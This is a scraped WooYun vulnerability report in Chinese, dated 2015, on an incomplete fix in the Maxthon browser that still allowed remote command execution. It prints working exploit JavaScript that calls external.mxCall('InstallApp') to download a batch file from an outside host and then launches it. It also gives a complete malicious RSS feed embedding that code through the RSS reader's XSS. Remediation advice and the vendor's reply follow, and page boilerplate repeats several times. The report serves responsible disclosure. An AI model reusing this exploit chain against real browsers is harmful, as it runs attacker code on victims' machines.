傲游浏览器修复不当导致依然可远程命令执行

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-097165

漏洞标题：傲游浏览器修复不当导致依然可远程命令执行

漏洞作者：路人甲

提交时间：2015-02-13 18:56

修复时间：2015-05-16 12:58

公开时间：2015-05-16 12:58

漏洞类型：远程代码执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-13：细节已通知厂商并且等待厂商处理中
2015-02-15：厂商已经确认，细节仅向厂商公开
2015-04-11：细节向核心白帽子及相关领域专家公开
2015-04-21：细节向普通白帽子公开
2015-05-01：细节向实习白帽子公开
2015-05-16：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

远看像修了，近看还没修，
也许是修了，只是没修好。
希望傲游新年来能在大家的共同努力下把安全做的越来越好。

详细说明：

1. 距离这个 WooYun: 傲游浏览器远程命令执行漏洞二漏洞，傲游已经更新了好几个版本。目前该漏洞已经被公开了。但是对于这个报告中所报告的问题，小问题确实是修了，但是最为关键的“核心”点，却依然没有得到修复。
A. 修复了报告中的“非关键点”，一个傲游域下的XSS。即：http://sso.maxthon.cn/quit.php这个页面被删除。
B. 禁用了 external.mxCall('InstallSkin', "http://xsst.sinaapp.com/test/mx.bat"), 这样使得我们无法向临时目录写入mx.bat
2. 然后上面这些点并非最致命的点， rss reader里可以导致执行命令的XSS却根本没有被修。
原漏洞中的 http://xsst.sinaapp.com/test/mxpoc.xml 直接打开，依然可以打开计算器。

傲游对rss reader里的富文本过滤正则没有做任何的改动。
3. 虽然傲游修复了原漏洞的 XSS 和 external.mxCall('InstallSkin', ..); 但这两个点实际上并不是最关键的。所以我们很容易再次执行任意命令。
------------------------------------------------------------
4. 其实这个漏洞，连傲游域下的XSS都不需要。
在 mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?http://xsst.sinaapp.com/test/mxpoc.xml 这个域下，我们只需要嵌入一个iframe，iframe的src为 http://www.maxthon.cn/，然后通过 iframe.contentWindow.external 即可有权限调用 mxCall函数。
而external.mxCall('InstallSkin', ..); 虽然被禁止了，但是

external.mxCall("InstallApp", "http://xsst.sinaapp.com/test/mx.bat");

依然还是可以使用的。。。，治标不治本。
5. 所以我们很容易重新写出下面的利用代码。

var x=document.createElement("iframe");
x.src="http://www.maxthon.cn";
x.onload=function(){
	x.contentWindow.external.mxCall("InstallApp", "http://xsst.sinaapp.com/test/mx.bat");
	setTimeout(function(){
		var s=document.createElement("iframe");s.src="mx://res/notification/";s.onload=function(){s.contentWindow.maxthon.program.Program.launch(s.contentWindow.maxthon.system.Environment.getFolderPath("Mx3data")+"Temp/mx.bat","")};document.body.appendChild(s);
	},1500);
};
document.body.appendChild(x);

6. 接着同原漏洞一样，利用 rss reader 的XSS即可。

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>wooyun.org 最新提交漏洞</title>
<link>http://www.wooyun.org</link>
<ttl>5</ttl>
<description>wooyun.org</description>
<language>zh-cn</language>
<generator>www.wooyun.org</generator>
<webmaster>webmaster@wooyun.org</webmaster>
<item>
<link> WooYun: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞 </link>
<title><![CDATA[苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞]]></title>
<description><![CDATA[<strong><iframe name='var%20x%3Ddocument.createElement%28%22iframe%22%29%3B%0Ax.src%3D%22http%3A//www.maxthon.cn%22%3B%0Ax.onload%3Dfunction%28%29%7B%0A%09x.contentWindow.external.mxCall%28%22InstallApp%22%2C%20%22http%3A//xsst.sinaapp.com/test/mx.bat%22%29%3B%0A%09setTimeout%28function%28%29%7B%0A%09%09var%20s%3Ddocument.createElement%28%22iframe%22%29%3Bs.src%3D%22mx%3A//res/notification/%22%3Bs.onload%3Dfunction%28%29%7Bs.contentWindow.maxthon.program.Program.launch%28s.contentWindow.maxthon.system.Environment.getFolderPath%28%22Mx3data%22%29+%22Temp/mx.bat%22%2C%22%22%29%7D%3Bdocument.body.appendChild%28s%29%3B%0A%09%7D%2C1500%29%3B%0A%7D%3B%0Adocument.body.appendChild%28x%29%3B%0A' src="javascript:eval(unescape(window.name));void 0; "/>简要描述：</strong><br/>苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞<br/><strong>详细说明：</strong><br/>暂未公开<br/><br/><strong><a href=" WooYun: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞 " target="_blank">更多内容 &gt;&gt;</a></strong>]]></description>
<pubDate>Wed, 05 Nov 2014 15:38:18 +0800</pubDate>
<category></category>
<author>路人甲</author>
<guid> WooYun: 苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞 </guid>
</item>
</channel>
</rss>

漏洞证明：

傲游最新版本： Version: 4.4.4.2000

打开 http://appmaker.sinaapp.com/poc/cn.maxthon/mxpoc_new.xml
可以看到我们的批处理被下载并执行。

修复方案：

1. 可以看到，这次利用里都不需要maxthon.cn的XSS了，所以光修傲游域下的XSS是没用的。
2. 与其禁用external.mxCall('InstallSkin', ..); 还不如，对 external.mxCall('InstallSkin', ..);中皮肤或者插件的路径进行严格的URL判断。不仅安全得多，也容易得多。
3. 一定要修复rss reader这个XSS才行啊。
4. 修复要修要害，不要修无关痛痒的位置啊。
5. 希望傲游新年来能在大家的共同努力下把安全做的越来越好。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-02-15 12:57

厂商回复：

感谢反馈. RSS 中的漏洞下版处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-097165

漏洞标题：傲游浏览器修复不当导致依然可远程命令执行

相关厂商：傲游

漏洞作者：路人甲

提交时间：2015-02-13 18:56

修复时间：2015-05-16 12:58

公开时间：2015-05-16 12:58

漏洞类型：远程代码执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-097165

漏洞标题：傲游浏览器修复不当导致依然可远程命令执行

相关厂商：傲游

漏洞作者： 路人甲

提交时间：2015-02-13 18:56

修复时间：2015-05-16 12:58

公开时间：2015-05-16 12:58

漏洞类型：远程代码执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-097165"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云